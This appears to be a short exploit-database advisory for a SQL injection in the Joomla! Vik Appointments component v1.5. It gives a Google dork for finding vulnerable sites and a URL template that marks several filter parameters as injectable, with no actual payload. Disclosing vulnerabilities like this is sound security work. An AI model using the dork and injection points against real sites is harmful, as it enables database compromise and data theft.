19 lines
No EOL
762 B
Text
19 lines
No EOL
762 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component Vik Appointments v1.5 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_vikappointments
|
|
# Date: 15.03.2017
|
|
# Vendor Homepage: https://extensionsforjoomla.com/
|
|
# Software : https://extensionsforjoomla.com/livedemo/vikappointments/
|
|
# Demo: https://extensionsforjoomla.com/livedemo/vikappointments/
|
|
# Version: 1.5
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php/en/our-staff?view=employeeslist&ordering=6&filters[group]=[SQL]&filters[service]=[SQL]&filters[country]=[SQL]&filters[state]=[SQL]
|
|
# ext4joo_vikappointmentsj3demo
|
|
# Etc..
|
|
# # # # # |